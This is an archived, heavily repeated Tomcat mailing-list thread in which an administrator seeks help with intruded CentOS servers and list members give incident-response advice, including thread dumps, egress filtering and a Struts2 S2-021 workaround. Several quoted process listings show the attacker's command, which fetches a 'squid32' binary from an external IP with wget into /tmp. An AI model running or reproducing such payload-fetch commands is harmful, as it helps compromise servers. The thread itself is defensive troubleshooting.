[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS
release 5.8 (Final) [root@arcbaappvrt05 tomcat]#
For now i havent see that the squid process whas launched so i
couldnt do a dump
Letme know if you need more information.
BTW, pastebin links will work for one week.
Kind regards, yours
Saludos.- Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
lsantagost...@gmail.com:
Ok, i will do the following:
1) thread dump of running tomcat instance 2) Pastebin the
running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.- Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 10:55 GMT-03:00 Christopher Schultz
ch...@christopherschultz.net:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh
/tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00
wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to
varoius places.
Right now its time to leave the office, but in a few hours
i will paste in pastebin access logs, config files,
wherever you tell me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}]
sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not
just any JVM process.
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external
process.
+1
The only things that ship with Tomcat that call Process.exec()
are the CGI servlet and SSI, both of which are disabled by
default. So, either you have an insecure CGI/SSI
configuration, your web application has a vulnerability, or you
have deployed something like the Manager application and
improperly-secured it.
A classic example of such an intrusion might be that someone
got a foothold elsewhere into your network, and the Manager
web application is not properly secured with a password, etc.
- -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG
with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
RE: Regarding i think an intrusion
Date: Wed, 30 Apr 2014 12:35:52 -0300
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij
MGPor favor, pegue el contenido de los siguientes archivos de registros en
Pastebin y enviarnos link:
-rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38
localhost.2014-04-30.log-rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19
localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19
PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat tomcat 43M Apr 30 12:18
portal-ht.log-rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09
portal-mh.log-rw-rw-r-- 1 tomcat tomcat 58M Apr 30 12:19
portal-pdi.log-rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt
MGSaludos Cordiales desde EEUU
Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
for you to see the logsizes)
A little more about the infraestructure i've mounted ill do some ascii art.
internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
(3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
Apache(2) is serving static content so haproxy(1) at the first level does
http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who uses
tomcat(7) (solr service) using haproxy(6) using L4 connection.
Versions:
Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41
[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
OS: CentOS 5.8 64 bit
[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#
For now i havent see that the squid process whas launched so i couldnt do a
dump
Letme know if you need more information.
BTW, pastebin links will work for one week.
Kind regards, yours
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
Ok, i will do the following:
1) thread dump of running tomcat instance
2) Pastebin the running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 10:55 GMT-03:00 Christopher Schultz
ch...@christopherschultz.net:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius
places.
Right now its time to leave the office, but in a few hours i will
paste in pastebin access logs, config files, wherever you tell
me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
├─java─┬─sh───wget │ └─263*[{java}]
sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external
process.
+1
The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.
A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly
Re: Regarding i think an intrusion
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini
lsantagost...@gmail.com wrote:
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij
From the logfiles it looks like you have struts2 applications. It might be
that you are hit by a security problem within struts2 ( Konstantin forwarded a
warning a few days ago
http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html
).
Note that logsfiles, are not the logfiles itsef but only a ls -lah
(just
for you to see the logsizes)
A little more about the infraestructure i've mounted ill do some ascii
art.
internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
(3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
That seems a bit too complex. In my eyes you need no haproxy between httpd and
tomcat when you use mod_jk.
Regards
Felix
Apache(2) is serving static content so haproxy(1) at the first level
does
http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4
connection)
using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who uses
tomcat(7) (solr service) using haproxy(6) using L4 connection.
Versions:
Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41
[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
OS: CentOS 5.8 64 bit
[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#
For now i havent see that the squid process whas launched so i couldnt
do a
dump
Letme know if you need more information.
BTW, pastebin links will work for one week.
Kind regards, yours
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
lsantagost...@gmail.com:
Ok, i will do the following:
1) thread dump of running tomcat instance
2) Pastebin the running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 10:55 GMT-03:00 Christopher Schultz
ch...@christopherschultz.net:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius
places.
Right now its time to leave the office, but in a few hours i will
paste in pastebin access logs, config files, wherever you tell
me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
├─java─┬─sh───wget │ └─263*[{java}]
sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not just
any
JVM process.
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external
process.
+1
The only things that ship with Tomcat that call Process.exec() are
the
CGI servlet and SSI, both of which are disabled by default. So,
either
you have an insecure CGI/SSI configuration, your web application has
a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.
A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web
application
is not properly secured with a password, etc.
- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
Re: Regarding i think an intrusion
Hello Martin/Felix,
Im uploading mi logfiles so it will be available when finished uploading.
Regarding the configuration, its working in two other sites without
problem, and there is no problem putting L4 balancing with haproxy.
I have asked developers about that exploit, still without answer.
I will let you know how things are going, thanks for all =)
Regards/Saludos!
BTW: Martin, thanks for your spanish words Really appreciate =)
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 13:20 GMT-03:00 Felix Schumacher
felix.schumac...@internetallee.de:
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini
lsantagost...@gmail.com wrote:
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij
From the logfiles it looks like you have struts2 applications. It might be
that you are hit by a security problem within struts2 ( Konstantin
forwarded a warning a few days ago
http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html).
Note that logsfiles, are not the logfiles itsef but only a ls -lah
(just
for you to see the logsizes)
A little more about the infraestructure i've mounted ill do some ascii
art.
internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
(3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
That seems a bit too complex. In my eyes you need no haproxy between httpd
and tomcat when you use mod_jk.
Regards
Felix
Apache(2) is serving static content so haproxy(1) at the first level
does
http round robin balancing
Apache(2) connects to tomcat(5) through haproxy(4) (using L4
connection)
using mod_jk(3)
Tomcat(5) are the main app server (the ones gets intruded) who uses
tomcat(7) (solr service) using haproxy(6) using L4 connection.
Versions:
Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41
[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
OS: CentOS 5.8 64 bit
[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#
For now i havent see that the squid process whas launched so i couldnt
do a
dump
Letme know if you need more information.
BTW, pastebin links will work for one week.
Kind regards, yours
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
lsantagost...@gmail.com:
Ok, i will do the following:
1) thread dump of running tomcat instance
2) Pastebin the running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-30 10:55 GMT-03:00 Christopher Schultz
ch...@christopherschultz.net:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius
places.
Right now its time to leave the office, but in a few hours i will
paste in pastebin access logs, config files, wherever you tell
me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
├─java─┬─sh───wget │ └─263*[{java}]
sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not just
any
JVM process.
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external
process.
+1
The only things that ship with Tomcat that call Process.exec() are
the
CGI servlet and SSI, both of which are disabled by default. So,
either
you have an insecure CGI/SSI configuration, your web application has
a
vulnerability, or you have deployed something like the Manager
application
Re: Regarding i think an intrusion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH ob6Km1Clt4KNLKVyQjt+ =8KFm -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello Christopher, thanks for your response. I have a copy of 4.sh and squid (binary ELF file) and tried to see using strings what this program do. I couldn’t see anything =( Im monitoring the server for getting a dump at the moment this injection occurs. Files still uploanding =( Thanks for all, kind regards Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 14:07 GMT-03:00 Christopher Schultz ch...@christopherschultz.net : -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finished uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean-up after themselves. That's certainly what's doing the evil work. You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page). Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess-around with code that is already available on the site, though. - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH ob6Km1Clt4KNLKVyQjt+ =8KFm -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Regarding i think an intrusion
Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. PS: This is my first mail to this list, so i apologize for this not gentle presentation. Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini
Re: Regarding i think an intrusion
Hi, I am learning to set up a server and I found this article about security http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. PS: This is my first mail to this list, so i apologize for this not gentle presentation. Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini
Re: Regarding i think an intrusion
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com wrote: Hello list, Im facing an issue in 6 tomcat server that are getting penetrated and they are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as to how they are accessing your machines. For example, if they are deploying a WAR file to your server, it could mean that they have access to the Manager application on your server. Any details you can share, might be helpful. Im using 7.0.53 on my servers. Running Centos 5.8 Let me know what information you need. Do you have an access log? If not, enable one. If the attacker is not deleting it, it could show you more about who they are and what requests they are executing to access your server. Assuming they are entering through your application and not some other way. Dan PS: This is my first mail to this list, so i apologize for this not gentle presentation. Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius places.
Right now its time to leave the office, but in a few hours i will paste in
pastebin access logs, config files, wherever you tell me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
├─atop
├─crond
├─dbus-daemon
├─events/0
├─events/1
├─events/2
├─events/3
├─httpd───8*[httpd]
├─irqbalance
├─2*[iscsid]
├─iscsiuio───3*[{iscsiuio}]
├─java─┬─sh───wget
│ └─263*[{java}]
├─khelper
By the way, logfiles are really big, 200 mb each one, ill try to set up a
dropbox account so i can share it.
Thanks and regards
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-29 17:34 GMT-03:00 Daniel Mikusa dmik...@gopivotal.com:
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini
lsantagost...@gmail.com wrote:
Hello list,
Im facing an issue in 6 tomcat server that are getting penetrated and
they
are executing malicious scripts on my server.
Can you share more about what they are doing? It might give some clues as
to how they are accessing your machines. For example, if they are
deploying a WAR file to your server, it could mean that they have access to
the Manager application on your server.
Any details you can share, might be helpful.
Im using 7.0.53 on my servers. Running Centos 5.8
Let me know what information you need.
Do you have an access log? If not, enable one. If the attacker is not
deleting it, it could show you more about who they are and what requests
they are executing to access your server. Assuming they are entering
through your application and not some other way.
Dan
PS: This is my first mail to this list, so i apologize for this not
gentle
presentation.
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
sorry, but i forget to post
/usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-29 17:41 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius places.
Right now its time to leave the office, but in a few hours i will paste in
pastebin access logs, config files, wherever you tell me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
├─atop
├─crond
├─dbus-daemon
├─events/0
├─events/1
├─events/2
├─events/3
├─httpd───8*[httpd]
├─irqbalance
├─2*[iscsid]
├─iscsiuio───3*[{iscsiuio}]
├─java─┬─sh───wget
│ └─263*[{java}]
├─khelper
By the way, logfiles are really big, 200 mb each one, ill try to set up a
dropbox account so i can share it.
Thanks and regards
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-29 17:34 GMT-03:00 Daniel Mikusa dmik...@gopivotal.com:
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini
lsantagost...@gmail.com wrote:
Hello list,
Im facing an issue in 6 tomcat server that are getting penetrated and
they
are executing malicious scripts on my server.
Can you share more about what they are doing? It might give some clues
as to how they are accessing your machines. For example, if they are
deploying a WAR file to your server, it could mean that they have access to
the Manager application on your server.
Any details you can share, might be helpful.
Im using 7.0.53 on my servers. Running Centos 5.8
Let me know what information you need.
Do you have an access log? If not, enable one. If the attacker is not
deleting it, it could show you more about who they are and what requests
they are executing to access your server. Assuming they are entering
through your application and not some other way.
Dan
PS: This is my first mail to this list, so i apologize for this not
gentle
presentation.
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
Re: Regarding i think an intrusion
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius places.
Right now its time to leave the office, but in a few hours i will paste in
pastebin access logs, config files, wherever you tell me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
├─java─┬─sh───wget
│ └─263*[{java}]
sh launched by tomcat's java?
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external process.
Best regards,
Konstantin Kolinko
-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
